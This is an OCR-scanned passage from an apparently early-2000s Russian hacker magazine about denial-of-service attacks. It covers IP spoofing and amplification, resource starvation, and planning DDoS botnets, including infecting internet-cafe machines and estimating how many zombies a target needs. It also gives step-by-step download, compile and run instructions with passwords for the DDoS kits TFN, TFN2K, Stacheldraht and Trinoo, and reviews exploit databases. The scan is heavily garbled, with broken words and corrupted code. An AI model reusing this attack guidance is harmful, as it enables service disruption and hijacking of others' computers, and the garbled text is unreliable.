ший шанс за3.147005`ить вражеский сервак. Все очень 
просто :). Но тут есть еще одна заковырка: а как же 
index.html, которая отправляется хацкеру от сервера с 
каждым новым запросом? Она же тоже забивает атакующе- 
му канал. .. Да уж, еще как забивает - от такого трафика ха- 
керюга со своим хиленьким каналом уйдет в даун, когда 
сервер еще и почесаться не успеет :). Решение, как всегда, 
по-хацкерски простое: подменять source IP (айпишник от- 
правителя) в пакетах запросов на какой-нибудь другой, 
чтоб проклятые index.html уходили на этот самый другой 
адрес, не забивая канал хакера. При этом желательно, чтоб 
source ТР в каждом запросе был разный, a 
то нехилая нагрузка пойдет на машину с 
этим адресом, и может спохватиться админ 
сети, которой она принадлежит, - лишний 
шум, лишняя возня - ничего хорошего. А 
так на разные ТР`шки приходит какая-то 
хтмлка - ну, подумаешь, ошибка маршрути- 
зации... 

Если ты хорошенько пошевелишь мозгами, 
то сам догадаешься, как можно кого-ни- 
будь задосить еще одним способом: нахо- 
дится огромная сеть (с кучей машин) на 
широченном канале, и ей шлются запросы, source ТР в ко- 
торых заменен на ТР жертвы. Вся эта байда начинает слать 
на несчастный ТР` шник ответы, думая, что запросы пришли 
именно от него, забивая по самые уши канал атакуемому и 
устраивая бедняге mera3.14zDoS :). Такая фишка называет- 
ся усилением (или умножением) Оо5-атаки. 


Недостаток ресурсов (resource starvation) 

Атаки, направленные на захват критических системных ре- 
сурсов: процессорное время, место на харде, память и т.д. 
Resource starvation часто очень похож на bandwidth соп- 
sumption: взломщик опять-таки отсылает кучу запросов на 
сервер, после чего тому наступает полный 3.142005 :). Но 
на этот раз пакеты не заби- 
вают канал хоста-жертвы, а 
занимают, скажем, все его 
процессорное время. Ведь 
на обработку каждого паке- 
та сервак затрачивает неко- 
торое процессорное уси- 
лие. Остается только вы- 
брать такие пакеты, на кото- 
рые процессорного времени 
тратится достаточно много, 
и вперед - бомбить ими тач- 
ку! Канал-то может оказаться достаточно широким - с ним 
все будет ок, а вот проц просто захлебнется, обрабатывая 
всю эту бомбежку. Результат - все остальные процессы ви- 
сят, пользователи не могут получить доступа к сервисам. 
Еще один популярный пример - это когда хард забивается 
логами. Если админ - ламо, он может криво отконфигури- 
ровать систему логирования на своем серваке, не поставив 


ей лимит. Тогда достаточно выбрать такие пакеты, которые 
жрут в логах больше места, и начать отсылать их на сервер 
пачками. Через какое-то время файлы логов разрастутся 
до немереных размеров, сожрут все место на харде, и ма- 
шина опять окажется в “затруднительном положении”. 
Правда, это покатит только на самых ламерских серваках - 
грамотные люди держат логи на отдельном от системного 
харде. Также resource starvation актуален, если у хакерюги 
уже есть какой-то (ограниченный) доступ к ресурсам ма- 
шины (например, у него есть непривилегированный акка- 
унт) - тут поле для действий значительно шире в том смыс- 
ле, что взломщик не ограничен одними только пакетами, 
которые он может отсылать на удаленный сервер. Тут нема- 
ловажную роль играет, насколько грамотно построена сис- 
тема квотирования. Например, если на хостинге есть до- 
ступ к Cgi, можно написать 
скрипт, который нехило 
жрет памяти или, опять же, 
ресурсов проца (ну, скажем, 
циклически создает какие- 
нибудь огромные масси- 
вы/хэшы в памяти или вы- 
числяет какие-нибудь гро- 
моздкие математические 
формулы), и обратиться к 
нему несколько сот/ты- 


Resource starvation актуален, если y накерюги 
уже есть какой-то [ограниченный] доступ к ресурсам 
машины (например, y него есть непривилегированный 
аккацнт] - тут поле для действий значительно шире 

в том смысле, что взломщик не ограничен 
одними только пакетами, которые он может 
отсылать на удаленный сервер. 


сяч/десятков тысяч раз. Если система квотирования наст- 
роена глючно, то такой скрипт очень скоро отожрет всю па- 
мять (или забьет проц), а если все пучком, то процесс 
скрипта, достигнув поставленного ему лимита в жоре памя- 
ти, не получит доступа к мозгам до тех пор, пока не выгру- 
зит оттуда старые данные. 


Ошибки программирования (programming flaw) 

Эти атаки направлены на слабые места, баги и недокумен- 
тированные функции операционных систем, программного 
обеспечения, процессоров и программируемых микросхем. 
Зная дырки в чем-то из вышеперечисленного, можно со- 
здать и отправить по назначению определенный пакет, ко- 
торый вызовет какую-либо ошибку, переполнение буфера 
или стека. В результате этого возможны тяжкие последст- 
вия для всей системы. Она 
будет виснуть, глючить и 
биться в конвульсиях. При- 
чем, если хорошо знать ар- 
хитектуру процессора, на 
котором запущенна систе- 
ма, то не составит труда вы- 
звать какую-нибудь некор- 
ректную инструкцию или 
операцию в их кремниевых 
мозгах. Все мы знаем, что 


не существует осей, софта и железа без багов. Недаром 
bug-traq на хакерских серваках и в нашем журнале по- 
полняются с завидной регулярностью, так что почаще в 
них заглядывай и сам экспериментируй (может, сам чего 
никому пока еще не известного откопаешь), и делай соот- 
ветствующие выводы. 

(Самый тривиальным пример: программер пишет клиент- 
серверное приложение, работающее по такому-то прото- 
колу, в спецификации которого сказано, что такое-то по- 
ле такого-то пакета может содержать максимум 65500 бит 
данных. Программер сам писал клиентскую часть, и, как 
оказалось, на практике больше 255 бит в это поле пихать 
не приходится, поэтому он написал свою клиентскую 
часть так, что она шлет в этом поле максимум 255 бит, а 
больше - не умеет. В серверной части проги кодер напи- 
can, что такая-то переменная (в которую будет переда- 
ваться содержимое того самого поля из того самого паке- 
та) имеет длину 255 бит (все равно больше приехать не 
может, так как клиентская часть не умеет отсылать боль- 
ше 255). Поставили сервак, раздали юзерам клиентские 
проги - все пучком, все работает, все довольны. Но тут 
пришел хакер, разобрался во всем этом деле и устроил в 
этом маленьком раю большой 3.142005. Он модифициро- 
вал клиентскую часть (или написал свою) так, чтоб та 
слала 65500 бит данных в том самом поле именно того па- 
кета. Все хорошо, протокол позволяет передавать данные 
такой длины, а вот сервер, написанный программером, к 
такого рода отношениям не готов... Данные приходят, и 
все 65500 бит записываются в переменную, размер кото- 
рой 255 бит, - нарушается организация памяти, прога 
глючит, сервак висит, клиенты не могут получить к нему 
доступ. 3.147005, короче :). 
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Маршрутизация и DNS 
Ну, тут и так все ясно - если иметь доступ к маршрутиза- спасти палового райана 
тору, то можно изменить таблицы маршрутизации таким = Ls 


образом, чтоб желающие попасть на сервак с IP’ шником oe 

таким-то попадали совсем на другой IP либо на IP, кото- 

рого вообще не существует. To же самое DNS, но уже в от- + М Ы Е Х 

ee сайтов. Если получить доступ к кэшу DNS ku, 4 oCOBHOCTb ИЛЮБ 
ривязать искомое доменное имя совсем к друго- O° arr : 

my ТР`шнику, и тогда юзвери будут попадать Ha этот са- © = алло HA МО | 


мый совсем другой сервер, а не туда, куда они хотели. Ес- 
ли же вставить вообще несуществующий ТР, то это будет 
больше похоже на DoS. 

Особенностью этих атак является то, что сам атакуемый 
сервак (да он, в общем-то, и не атакуем) продолжает нор- 
мально работать, в то время как его юзвери не могут на 
него попасть, думая, что он в дауне. 
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DoS-ATAKA - ВИРТУАЛЬНЫЙ АНАЛОГ ЯДЕРНОЙ ВОЙНЫ? 
Как видишь, 0о5-атак существует несколько, а средства 
для их проведения вполне доступны, и все необходимые 
инструменты для них можно найти в Инете. Так что устро- 
ить такую атаку при большом желании может даже ушас- 
тый ламер, если найдет готовые тулзы (обезьяна с грана- 
той). Последствия, к которым приводят такие забавы, мо- 
гут оказаться очень даже не детскими и пострашнее, чем 
последствия от вирусов. Именно поэтому 005 становится 
все более популярным и широко используемым в среде 
кибертеррористов и киберманьяков, а правительства не- 
которых развитых стран даже рассматривают вопросы ве- 
дения виртуальных войн. Так что будущее, которое лет 
10-20 назад нам рисовали в своих рассказах писатели- 
киберпанки, уже не за горами. 
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DoS - сокращение от английского Distributed Denial of 

Service, что означает «распределенная атака «отказ в 

обслуживании»». Слово «распределенная» говорит о 

том, что атака производится не одним компьютером и, 
соответственно, не по одному каналу, а целой группой компью- 
теров-зомби, которые одновременно начинают атаку. Использу- 
ется как грубая сила, так сказать, танком напролом, для завала 
сервера (3.147005 серверу) или роутера (3.147005 целому сег- 
менту сети). 


Приблизительная схема 0005 такова: хакер ломает кучу сер- 
ваков по всему Инету, устанавливает туда 00о5-модули, а по- 
том, когда возникает соответствующая необходимость, коман- 
дует всем своим зомбированным сервакам валить жертву. Со- 
ответственно, чем больше у него таких зомби, тем страшнее 
атака. Только представь, ведь существуют 0о5-атаки, которые 
позволяют забить более мощный канал, чем у атакующего, а 
при DDoS общая пропускная способность всех зазомбирован- 
ных машин может в десятки раз превосходить пропускную 
способность атакуемого! 


Хорош этот способ тем, что не требует от устроителя данного 
веселья толстого канала связи. В принципе, он может даже не 
находиться в сети во время атаки, так как в данном случае ис- 
пользуется чужой канал, чужой трафик и чужие компьютеры. 
Еще один плюс, даже если при 0005 вылетит (вовремя выклю- 
чат) половину компьютеров, атака все равно будет чувстви- 
тельна для жертвы. 

Работает это очень просто, и до сих пор загадка, почему данный 
вид атаки является наиболее свежим и малоиспользуемым. Как 
известно, любой канал Интернета не резиновый и имеет свои ог- 
раничения. Вот на этом все и основано, то есть забивание кана- 
ла мусором. Иногда бессмысленным, иногда конкретными за- 
просами, иногда пакеты формируются так, чтобы ответ сервера 
был по размеру больше запроса. DDoS-mogynu могут быть также 
разными по написанию и использованию, например, бывают 
этакие навороченные троянские кони с системой прицеливания, 
а бывают просто бомбы с часовым механизмом. Даже баннер 
при желании можно использовать как DDoS-mogynb. Для распро- 
странения можно использовать чаты, форумы или мыло. В прин- 
ципе, для DDoS можно заюзать прокси-сервер, но данный метод 
пока мало обкатан и не дает нужных результатов. 

По видам можно разделить DDoS-mopynu на саморазмножаю- 
щиеся (e-mail вирусяги) и размножающиеся вручную (лома- 
ешь и ставишь). Для размножения вручную хорошо подходят 
компы в интернет-кафе, и если приготовиться к акции за пару 
месяцев, то можно осуществить хорошую атаку, а если есть 
друзья в других городах, готовые пройтись по местным интер- 
нет-кафешкам, то атака получится просто замечательная. Как 
правило, серверные модули после установки слушают порт и 
ждут команд, поэтому вероятность обнаружения у них выше, 
чем у молчаливых, которые имеют все данные о жертве в себе 
и ждут своего часа, никак не проявляя себя. Еще делят по за- 
просам: на посылающих «мусор», это случайные данные, как 
правило, посылаются по ЦОР или ТСМР; расширяющиеся, на- 
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пример, минимальный запрос на НТТР-сервер имеет длину па- 
кета 7 байт, а ответ зависит от сервера, WWW.yahoo.com в ответ 
послал 21239 байт, что в 3000 раз больше; и загружающие сер- 
вер, что очень эффективно против поисковых машин и страниц, 
собранных с использованием Рей или РНР. 


Итак, хакер нашел себе кучу компов и хочет завалить любимый 
сервер, как же найти слабое место? Для начала, как и перед лю- 
бой битвой, надо изучить своего противника. Прежде всего уз- 
нать, какая стоит система на сервере, хотя бы примерно. Если 
это 95 или 98 форточки (что крайне маловероятно), то доста- 
точно знать, что максимальное количество соединений на дан- 
ной OC - 255. Понадобится флудилка вроде PortFucker и при- 
мерно 3-4 машины. Запустив этот агрегат на порт 80, можно ид- 
ти пить кофе, поскольку порты забьются достаточно быстро, и 
до тех пор, пока админ файрволом или роутером не отрежет за- 
просы, сервер будет недоступен ввиду слишком большой заня- 
тости. Это больше всего похоже на анекдот про Ржевского, по- 
мнишь? Дали мне одну свечку в левую руку, вторую - в правую, 
дают третью, а я и не знаю, куда ее деть... Вот так и сервер - 
вроде как занят, вроде работает, а никто этого не видит. Пой- 
дем дальше: если это NT4/2000/XP, то можно и старым спосо- 
бом, но надо значительно больше машин, при 64М КАМ на сер- 
вере он нормально держит 7000 соединений, а значит надо 30 
машин под 95/98, можно и 2-3 под МТ, но сами зомби тоже по- 
рядком подвиснут. В данном случае можно просто загрузить 
сервер мусором и забить канал (ЦОР пакеты), что сильно затор- 
мозит сервер. Но как Ha NT, так и на любом сервере Linux есть 
такая хорошая вещь, как timeout, то есть ограничение по вре- 
мени. Это очень скользкая часть, поскольку если ограничение 
маленькое (1-2 секунды), то клиенты на медленном канале бу- 
дут с трудом получать необходимое. Но если Timeout около ми- 
нуты, то это самое слабое место, причем нет разницы, где он ус- 
тановлен, на РОРЗ-порту или на FTP. Можно написать прогу, ко- 
торая будет коннектиться, посылать команду типа «help» и 
опять коннектиться, и опять «help», поскольку сервер не отли- 
чает «хорошего» клиента от зомби, он будет вынужден висеть с 
каждым клиентом по минуте, а это достаточно для забивания 
всех возможных ресурсов. Если же жертва - поисковый сервер, 
то можно сконнектиться, сделать запрос по букве «а», вторым 
сконнектиться, сделать запрос по букве «б» и т.д. Все закон- 
чится тем, что сервер будет искать и мучить себя до потери 
пульса, а пульс сервак «пень-3/256МЬ/канал на 64к» потерял 
после двенадцатого запроса. Если же это определенно линух, 
да еще и на хорошей машине, то тут только мусор, то есть если 
машина хороша, то слабое место в ней - это ее канал в И-нет, а 
следовательно, надо набирать как можно больше зомби и уст- 
раивать одноразовую массовую бомбардировку. 

Ну, допустим, что с жертвой мы разобрались, теперь давай 
посмотрим на хакерское «оборудование», то есть программы 
для зомбирования машин. Прежде надо определиться, что 
именно лучше всего подходит. Если есть доступ к большому 
количеству интернет-кафе и им подобным заведениям, то пи- 
сать надо определенно под форточки. Если же есть огромное 
количество серваков с возможностью запуска Perl, то на нем 
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и надо писать. А если имеется просто 2000000 показов бан- 


неров и при этом есть возможность показывать Flash-OaHHe- 
ры или ПЕт(-баннеры (что значительно лучше) то ими и надо 
пользоваться. Затем, выбрав на чем писать и выбрав тактику 
нападения, неплохо посчитать, сколько надо машин и что 
лучше делать - серверподобного зомби или же все-таки бом- 
бу с часами. Определившись и прикинув план работы про- 
граммы (например, ждем 12:00 пятницы тринадцатого, затем 
начинаем бомбежку), стоит приступить к написанию про- 
граммы. При реальных взломах не рекомендуется пользо- 
ваться готовыми 0005-модулями, они хороши в обучающих 
целях, но на практике их быстро найдут, и жертвоприноше- 
ние не осуществится. 


НЕМНОГО ИСТОРИИ 

Ну, а что бы не быть голословным и показать, что это все дейст- 
вительно работает, давай посмотрим реальное прошлое ака ис- 
торию. 

1. Yahoo 

Наиболее шумный случай использования 0005. Произошел он в 
начале февраля 2000 года с сервером компании yahoo и отрубил 
его на три часа. Для компании такого размаха, как yahoo, три ча- 
са - это, по примерным подсчетам, 1.2 млрд. баксов. По заявле- 
ниям прессы, атака была произведена с университетских ком- 
пьютеров, которые оказались зомбированными. По примерным 
подсчетам было задействовано более тысячи компьютеров-зом- 
би. В то же время был атакован сервер интернет-магазина е-Бау, 
а затем книжный магазин amazone.com. Атакующим (не зомби 
:)) оказался канадец, называющий себя MafiaBoy, пятнадцати лет 
отроду. Все атаки производились банальным флудом UDP-nake- 
тами с корявым содержанием, расчет велся на слабый канал, и 
стоит отметить, в расчетах он не ошибся, поскольку канал дейст- 
вительно не выдержал. Парень отделался 160 долларами штра- 
фа и восьмью месяцами лишения свободы. 

2. RLE-SLE 

Целенаправленное использование баннеров одной компании 
против другой. Ребята из RLE заметили, что их дизайн был сли- 
зан 51Е-шниками, после чего (по словам владельцев SLE) было 
зарегистрировано три сайта, и начались «показы» их бынне- 
ров с частотой примерно 20-30 показов в секунду. Сайт плюх- 
нулся, переделали алгоритм, подняли. Теперь уже на всех уча- 
стников (а не только на тех трех зарегистрированных) пошли 
показы с частотой 100-150 запросов в секунду. В принципе 
ребята просто хотели помочь с накруткой баннеров :)))). Но 
вот сервер SLE не выдержал хорошего потока, от чего слег. 3a- 
вершение этой истории подробно не описано, но дизайн ре- 
бятки сменили. В настоящий момент сайт www.sle.com.ua на- 
ходится в дауне. Способ решения проблемы нельзя назвать 
тактичным, но то, что он сработал и ожидаемый результат был 
получен, - это очевидно. Учитывая размах RLE (вчера было по- 
казано 27922759), использование этой дырочки может повре- 
дить и более сильным сайтам, не каждый может выдержать та- 
кой резкий наплыв «посетителей». 
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В основном все 0005-тулзы работают по такой схе- 

ме: хакер получает доступ к машине, устанавливает 

на нее программу-демона из комплекта своей 

0005-тулзы - проделывает то же самое еще с не- 
сколькими машинами. Машина, на которую установили де- 
мона, называется “зомби” (а процесс этот называется - 
“зомбировать”). Потом он запускает программу-мастера 
(тоже из комплекта ОВо5-тулзы) на своем компе (иногда 
мастера, как и демона, можно установить на удаленную ма- 
шину) и командует ей начать атаку на такой-то ТР. Мастер в 
свою очередь командует всем демонам пинговать жертву. 
Получается, что несколько машин из разных точек нета ата- 
куют одну, и, если зомбированных компов достаточно, 
жертве скоро настает 3.147005, а вернее - 3.1470005, так 
как атака распределенная ;). Это теория. А мы сейчас погля- 
дим, что собой представляют эти самые ОВо5-тулзы на са- 
MoM деле. [1е1`$ do it! 


TFN 

Tribe Flood Net Project - одна из первых DDoS-tyn3. Арсенал 
TFN состоит из udp flood, syn flood, icmp flood и smurf’ а. TFN 
был разработан хацкером под ником Mixter, который счита- 
ется одним из наиболее грамотных людей, шарящих в 0005- 
атаках (его статью о будущем DDoS-atak можно почитать тут: 
http://packetstorm.linuxsecurity.com/distributed/tfn3k.txt). 
Cam ТЕМ можно — утянуть по — ЭТОЙ ссылке: 
http://packetstorm.linuxsecurity.com/distributed/tfn.tgz. 
После распаковки появится директория TFN. Чтоб скомпи- 
лировать тулзу, надо перейти в эту директорию и ввести 
“make”. После этого появится три исполняемых файла: td, 
tfn и tfn-rush. td - это демон, tfn - мастер, а tfn-rush - тоже 
мастер, но работающий в каком-то rush-mode. Итак, давай 
установим у себя на машине демона, чтоб посмотреть, как 
все это работает, - вводим в командной строке: 


./td 


Ha этом тяжелейшая задача по установке демона решается ;). 
Теперь надо создать iplist - файл, в котором должны лежать IP- 
адреса зомбированных компов. Так как зомби у нас один (на- 
ша же тачка), открываем любой текстовый редактор, пишем в 
нем одну строку - 127.0.0.1 - и сохраняем его под именем iplist 
в директорию, куда разархивировался ТЕМ. Теперь можно ата- 
ковать ;). Вводим: 


./tfn ./iplist 3 127.0.0.1 (Рис. 1) 
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Это мы, типа, атаковали пингом. Если хочешь узнать, какие еще 
есть способы, запусти Ёп без параметров. 

Чтоб подвести итог, могу сказать, что ТЕМ - отличный инстру- 
мент, четкий, понятный, простой и безглючный. Но уже доста- 
точно древний (от чего он не стал хуже - просто его потомки 
стали лучше)... 


TFN2H 


Это современная версия обычного TFN (oT Toro же 


Maxter a). Отличий очень много - появилась куча наворо- 
тов. Теперь тулза позволяет при каждом соединении масте- 
ра с демоном произвольно менять порты и методы атаки - 
так что блокировка Ягема ` ом одного из портов уже не 
спасает. Появилась куча новых атак, пароль на доступ к де- 
мону (чтоб левые перцы не могли воспользоваться зазомби- 
рованной тобой тачкой) ит.д. Кроме того, ТЕМ2К умеет по- 


человечески спуфить ТР`шники (если ничего не задавать 
специально, IP будет спуфиться random’ ом). 

Одно плохо - при компилировании этой тулзы полезли баги 
:(. Пришлось лезть в исходники и искать ошибки. Все запаха- 
ло нормально, когда я заменил везде в файлах ip.h, ip.c и 
tribe.c “in_addr” на “in_addr_”. Ну ладно, будем считать, что 
когда ты сидишь под линухом, лезть постоянно в исходники - 
это в порядке вещей (а это разве плохо? нужна тебе прога - 
лезь в исходники. Под виндами такой возможности вообще 
нет - если прога глючит и не работает, то можно забыть про 
нее насовсем - прим. ред.). Зато после моих ковыряний все 
нормально откомпилировалось (во время компиляции меня 
попросили задать пароль), и в директории появилось не- 
сколько бинарников, из которых нас интересуют только td 
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(демон) и tfn (мастер). Как и раньше, запускаем демона 
Г (./td), а потом мастера: 


/tfn -f ./iplist -c 6 -1 127.0.0.1 (Рис. 2) 


И вводим пароль, который задали во время компиляции. Это 

опять icmp flood. Чтоб узнать, как делаются другие атаки, запу- 
cm tfn без параметров. 
Итог: TFN2k - хоть и немного подглючил при установке, оказал- 
ся очень мощным и гибким 0005-инструментом. Наверное, са- 
мым лучшим на сегодняшний день :). Да, чуть не забыл - TFN2k 
качается тут: http://packetstorm.linuxsecurity.com/distrib- 
uted/tfn2k.tgz. 


STACHELDRAHT 
1 Уэтой тулзы печальная история - ее сначала зарезили в нера- 
бочем виде (некто Randomizer), и только потом некто Psychoid 
| отфиксил баги и добавил новых возможностей. Посмотрим, 
что получилось ;). К достоинствам можно отнести то, что тра- 
фик между демоном и мастером шифруется. Ну и, конечно, ку- 
ча доступных атак - тоже немаловажное ;) достоинство. И еще: 
Stacheldraht состоит не из двух частей, а из трех. Демон ста- 
вится на зазомбированной тачке, мастер-сервер ставится на 
любой удаленной тачке, а мастер-клиент - на тачке хацкера. 
Такой подход сводит к нулю возможность поймать взломщика 
и надавать ему по ушам. 
4 Взять можно тут: http://packetstorm.linuxsecurity.com/distrib- 
uted/stachelantigl.tar.gz. Распаковываем архивчик в директо- 
| рию ./stachel и идем компилировать: 


cd ./stachel 
make 

~ Попросят ввести пароль. Вводим и идем компилить дальше (в 
поддиректориях): 


| cd ./client 
make 
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Попросят ввести ТР-адрес сервака, на котором висит мастер. и 

Вводим 127.0.0.1 и идем дальше: 

cd ../telnetc oe: 
make 


Все должно пройти нормально :). Если все OK, лезем в папку 
./client и запускаем бинарник td (демон). Потом возвращаем- 
ся обратно в ./stachel и вводим: 


./mserv 127.0.0.1 
Прога (это мастер-сервер) отрапортует, что нашла одного кли- 
ента. Теперь можно потирать ручки и приступать к действиям 


;). Идем в директорию ./telnetc и вводим: 


./client 127.0.0.1 


» чи a 
Это и есть мастер-клиент. Прямо на входе он попросит ввести 
пароль. Вводим и попадаем в интерактивное меню тулзы. Кро- ' Af. 
ме всего прочего, тут куча приколов :))))). Например, прога 
пишет: “type .help if youare lame”, а ктебе обращается пример- 
но так: “по packet action at the moment, sir” :). He DoS-tyn3a, a 


шут какой-то :))). Ок, давай традиционно попингуем самих се- 
бя и оставим Stacheldraht в покое: 


-micmp 127.0.0.1 (Рис. 3) 


Для остальных атак введи “.help”. 
Итог: рулезнейшая прога! Достаточно продвинутая, обладает 
кучей функций, знает кучу атак. 


MSTREAM 


Эта тулза досталась мне в виде одного большого текстово- 


< ыы 


Итог: если бы что-нибудь запустилось, можно было бы подве- 
сти итог... 
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TRINOO 
Еще одна DDoS-tyn3a. Копируем отсюда архив: http://packet- 2 
storm.linuxsecurity.com/distributed/trinoo.tgz, распаковыва- | 
ем в какую-нибудь директорию и заходим в нее. (Рис. 5) 


Две папочки: ./daemon и ./master с соответствующими состав- 
ляющими Trin0O внутри. Сначала займемся мастером. Заходим 
в его папку: 


cd ./master 


и компиллируем мастера: 


го файла: в нем содержится код Makefile’ а, код master.c и код таке 
server.c. Если тебя не заломает выковыривать все из этого фай- 


м ла, можешь забрать его отсюда: http://packetstorm.linuxsecuri- После этого в папке появится бинарник ./master. Все, мастер 
~ ty.com/distributed/mstream.txt. Меня He ломает, так что я запу- готов :). (Рис. 6) 
~ стил текстовый редактор, аккуратно порезал и разложил все 
“Kak надо. В итоге у меня получилась директория с тремя фай- — Теперь лезем в папку с демоном 


лами внутри: Makefile, master.c и server.c. Компилирую: 
cd ../daemon 


make 


Там лежит всего один исходник - ns.c. Его придется править. 
Открываем и ищем следующий фрагмент: (Puc. 7 ) 


Это, типа, настройки мастера. Я настроил все вот так: (Рис. 8) | 
Далее надо откомпилировать п.с следующей командой: 


gcc -о daemon ns.c 


но что-то он у меня не захотел компилироваться :(. Пришлось 
лезть в исходник еще раз и смотреть, в чем проблема. А про- и | ~ 

блема в том, что компилятор не может найти функцию “crypt”, о 
которая заюзана в исходнике. (Рис. 9) 


Как ни странно, все сошлось с первого раза, и в папке появи- 
лось два бинарника: master и server. Запускаю демона: 
./server 
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Молча запускается и уходит в бэкграунд ;). Теперь запускаю 
мастера: 


./master (Рис. 4) 
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И этот уходит в бэкграунд... И что? И как? A как же DDoS-ata- 
Ки и все такое? Ничего не понял... 


Ковыряться неохота, поэтому просто убираю эту функцию на 
фиг, заменив ее на дурацкое сравнение следующим образом: 
(Рис. 10) 


Хреново, конечно, так делать, зато после этого все нормально 
откомпилировалось :). В папке ./daemon появился бинарник 
daemon. Запускаем ero: 
./daemon 


Теперь можно запустить и мастер: 


../master/master 


> ee 


Появится два вопросительных знака: (Рис. 11) 


Это, типа, мастер просит ввести пароль на запуск: вводим 
“gOrave”. Все, мастер запущен. Теперь, чтоб с ним работать, на- 
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до прителнетиться к порту 27665. 


telnet 127.0.0.1 27665 
Видим следующую штуку: (Рис. 12) 


Мастер ждет ввода пароля на соединение: вводим “betaalmos- 
done” и попадаем в командную строку ТИп00: (Рис. 13) 


Вот теперь можно развлекаться :). Нет... кое-что забыли. В 
директории мастера надо создать файл, название которого 
состоит просто из трех точек (“...”) - это аналог TFN овско- 
го ТрИ$Е`а. Пишем в него одну строчку (т.к. у нас только 
один демон) - 127.0.0.1 - и сохраняем. Теперь можно вер- 
нуться в меню проги. Если не знаешь, что делать, можно 
ввести “help”, и программа выплюнет список доступных ко- 
манд. Пингуем :): 


mping 127.0.0.1 

Итог: довольно глючная тулза, работает как-то криво (пакеты 
шлет, но почему-то очень вяло). В общем, лучше пользоваться 
чем-нибудь другим, благо DDoS-tyn3 достаточно. 
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it (Fos == =|) exit(=-1); 
wile (1) | 
Bzere(argql. 10:4]: 
bzarofbuf, 1024]; 
Pirin ети зоной | from | 2 
if (| (nomresd = pecvfrom(sock, bul, 
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/root/x/ddos/trinoo/daemon/ns.c byte 


ех1{ (0); 


} 
if (Роке == -1) exit(-1): 
while (1) { 
hzero(argl, 1024); 
bzero(buf, 1024); 
fromlen=sizeof (from) ; 
if ((numread = recvfrom(sock, 
&fromlen)) < 0) { 
perror("recvfrom"); 
continue ; 
} 
if (strstr("144", раЁ)= 


=0) { 


arg2 = malloc (sizeof (buf) ) 
sscanf(buf, "%s %s Хз", 
if (stremp("alfSYwfOhw.V. 
if(stremp(argl, 
to.sin_addr.s_addr 


1 oe I 
aaa") 


На этом, пожалуй, стоит закончить знакомство с ВВо5-тул- 
зами (хотя их еще много: Kaiten, Voyager Alpha Force и 
т.д.). Тебе, друган, я советую скачать все, что мы сегодня 
обозрели, и опробовать на практике (на своей тачке, есте- 
ственно - я тебя не призываю кого-либо DoS ить, Боже 
упаси...). Нагиморроешься, зато и знаний наберешься, а 
то сейчас, небось, читаешь и думаешь - “это не для меня”, 
“линукс еще какой-то ставить”, “A это не умею”, “не могу” 
ит.д. Ты сейчас какой журнал читаешь? Спец или фуфло 
какое-нибудь для домохозяек? Если Спец, то должен 
уметь... Удачи! ac 
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Эксплоит - это программа, позво- 
ляющая использовать какую-либо 
ошибку в системе безопасности и 
иметь с этого выгоды. Фактически, 
работающий эксплоит является 
венцом хакерского искусства. В 
каждой программе и на каждом 
сервере существует огромное ко- 
личество лазеек, позволяющих те- 
оретически стать суперюзером 
или послать сервак в даун. Но 
лишь успешная попытка использо- 
вать такую дырку рождает экспло- 
ит. А пока он не будет написан, ни- 
кто и не подумает выпустить за- 
платку к проколовшейся софтине. 
Чтобы написать свой собственный 
эксплоит, недостаточно одних 
только знаний в языках програм- 
мирования. Необходимо еще хоро- 
шо разбираться в особенностях 
конкретных операционных систем 
и системных функций. 
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Величина базы: - 
Удобство навигации: 9 
Частота обновлений: 9 
Бонусы: 3 


Этот сайт является представите- 
лем так называемой box network. 
а Вот его основной девиз: «The 
| resource for people to help avoid 
being hacked». Честно говоря, 
_— данный ресурс является фавори- 
ь том. Сейчас разберемся - почему. 
Как я ни пытался оценить размер 
базы этого ресурса, ничего не по- 
лучилось. Суть в том, что он не со- 
держит эксплоиты на своем серве- 
ре. Но на нем есть прямые ссылки 
на необходимый тебе материал 
(по большому счету, ведь все рав- 
но, где лежит классный эксплоит). 
А так как никто нигде не писал 
«эксплоитов у нас столько-то», то 
параметр «величина базы» мы не 
оценивали. 
При первом попадании на сайт 
надо выбрать русский язык в од- 
ном из выпадающих списков (в 
правом верхнем углу страницы). 
На основной странице узла можно 
найти свежие новости о послед- 
них дефейсах и эксплоитах. Час- 
тота обновления этой информа- 
ции просто поражает: как ни зай- 
дешь, увидишь новый эксплоит, 
датированный вчерашним днем. 
Это мощно! Небольшая ссылочка 
внизу фрейма с последними экс- 
плоитами - view all exploits - вы- 
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Интернет предоставляет огромное 
количество ресурсов по данной те- 
матике, но наиболее полезными в 
этом случае являются базы экспло- 
итов. В них ты можешь найти уже 
готовые работающие эксплоиты (к 
большинству из них уже, правда, 
выпустили заплатки, но не все ад- 
мины их себе поставили ;)) по кон- 
кретным стандартным багам и опе- 
рационным системам. Также такие 
сайты предоставляют достаточно 
полезные руководства по эксплуа- 
тации той или иной стандартной 
дырки, например, DoS- и DDoS-ata- 
кам, а также переполнениям стека 
и буфера. Исторически сложилось 
так, что эксплоиты пишутся на Cu 
(реже на ассемблере и Перле). По- 
этому, чтобы разобраться в том или 
ином деструктивном механизме, 
необходимы хотя бы минимальные 
знания синтаксиса языка Си. По- 


даст тебе все эксплоиты, отсорти- 
рованные по дням. Это очень 
удобно при детальном поиске. 
Идем дальше. Ровно по центру 
страницы (а она, надо сказать, 
длинная) есть куча гиперссылок, 
позволяющая получить инфу по 
различных аспектам компьютер- 
ной секьюрити. Авторы не обде- 
лили своим вниманием ни фри- 
кинг, ни крякинг, ни хакинг. 
Больше всего меня поразила над- 
пись возле ссылки, ведущей к уяз- 
вимостям родной винды. В пере- 
воде с английского она звучит 
примерно так: «Кто хакнет твою 
Винду?». Я как-то и не думал, что 
и мой комп можно хакнуть. Брр-р. 
Не дадимся! 

Среди этого набора гиперссылок 
можно выделить особо важную: 
«EXPLOITS». Думаю, ее смысл всем 
понятен. Щелкнув на ней, ты по- 
падешь на страничку, содержа- 
щую архив эксплоитов, отсорти- 
рованный по ОСям, бонусы и ссыл- 
ки на соседние ресурсы. Сразу 
оговорюсь, что здесь представле- 
ны эксплоиты ко всем ОСям (даже 
очень редким). Отдельно выделе- 
ны эксплоиты для брандмауэров, 
что, безусловно, радует. К бонусам 
мы вернемся чуть позже. 

Не стоит, однако, сразу тыкать в 
описанную выше гиперссылку. 
Среди других ссылок есть тоже 
очень полезные пункты. Напри- 
мер, ссылка «ICQ» указывает на 
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дробные комментарии авторов 
очень часто упрощают этот про- 
цесс и делают его даже приятным, 
особенно когда удается полностью 
схватить весь принцип программы 
:). Обзору баз эксплоитов и посвя- 
